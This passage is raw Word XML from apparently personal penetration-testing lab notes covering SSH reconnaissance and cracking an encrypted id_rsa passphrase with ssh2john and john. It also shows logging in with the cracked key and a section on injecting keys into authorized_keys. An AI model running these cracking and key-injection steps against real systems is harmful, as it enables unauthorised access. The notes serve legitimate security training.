      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C28">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2133600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="186" name="image179.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image179.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId248"/>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C29">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="835"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here, you would search up "OpenSSH 8.9p1 Ubuntu 3 exploit" and see what shows up</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C2A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="835"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from XXXXXXXXX 27.1.2. WEBSRV1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C2B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C2C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_3nv3kfjh1413" w:id="103"/>
      <w:bookmarkEnd w:id="103"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to find Linux version (of target machine) based on SSH version info</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C2D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you see something like "OpenSSH 8.9p1 Ubuntu 3" as shown in the picture above in the previous section, then search it up.</w:t>
      </w:r>
    </w:p>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The results contain a link to the Ubuntu Launchpad web page, which contains a list of OpenSSH version information mapped to specific</w:t>
      </w:r>
      <w:hyperlink r:id="rId249">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId250">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Ubuntu releases</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. In our example, the version is mapped to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Jammy Jellyfish</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is the version name for Ubuntu 22.04.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C30">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_koitt1f6zrf7" w:id="104"/>
      <w:bookmarkEnd w:id="104"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Decrypting SSH Key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C31">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As seen in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId251">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">EvilBox-One</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, sometimes the SSH Private Key we get will be encrypted, like in the screenshot below. So that means that when you try and use the SSH key, you will be prompted for a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">passphrase</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. We can use use ssh2john in order to crack the passphrase:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C32">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1447800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="290" name="image290.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image290.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId252"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="144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t xml:space="preserve">The name of the file containing private key is id_rsa</w:t>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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh2john id_rsa &gt; key.hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C37">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat key.hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C38">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">john key.hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C39">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1482"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This will tell you the passphrase of the </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C3A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C3B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh -i id_rsa mowree@192.168.1.21</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C3C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="422"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Log into SSH using the "-i" flag with the private key, and then when prompted, copy and paste the passphrase in order to use the private key</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C3D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C3E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C3F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qyg9acb7v6hn" w:id="105"/>
      <w:bookmarkEnd w:id="105"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Public and Private keys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C40">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C41">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In SSH,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> id_rsa </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is your private key, while </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id_rsa.pub</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is its corresponding public key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C42">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C43">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C44">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_y4fxs368ef7e" w:id="106"/>
      <w:bookmarkEnd w:id="106"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to turn on SSH if it's not on (how to open SSH)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C45">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Never tested this since SSH is usually always open on Linux machines</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="838"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check if it's installed </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="838"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dpkg -l | grep openssh-server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C48">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="838"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Install it if needed:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C49">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="838"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt update &amp;&amp; sudo apt install -y openssh-server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C4A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="838"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enable SSH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="838"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo systemctl enable ssh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C4C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="838"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Turn it on</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="838"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo systemctl start ssh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C4E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="838"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check status</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="838"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo systemctl status ssh</w:t>
      </w:r>
    </w:p>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C52">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_m0qjundbomkr" w:id="107"/>
      <w:bookmarkEnd w:id="107"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH public key injection attack via authorized_keys file</w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Regular Users: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Located in ~/.ssh/authorized_keys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C55">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Root:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Located in /root/.ssh/authorized_keys</w:t>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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Permissions should be 600 for files in authorized_keys and the .ssh directory itself should be 700</w:t>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As seen in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Amaterasu PG play</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C5A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C5B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also used in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId253">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Roquefort</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice in order to get more stable connection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C5C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C5D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also used in the </w:t>
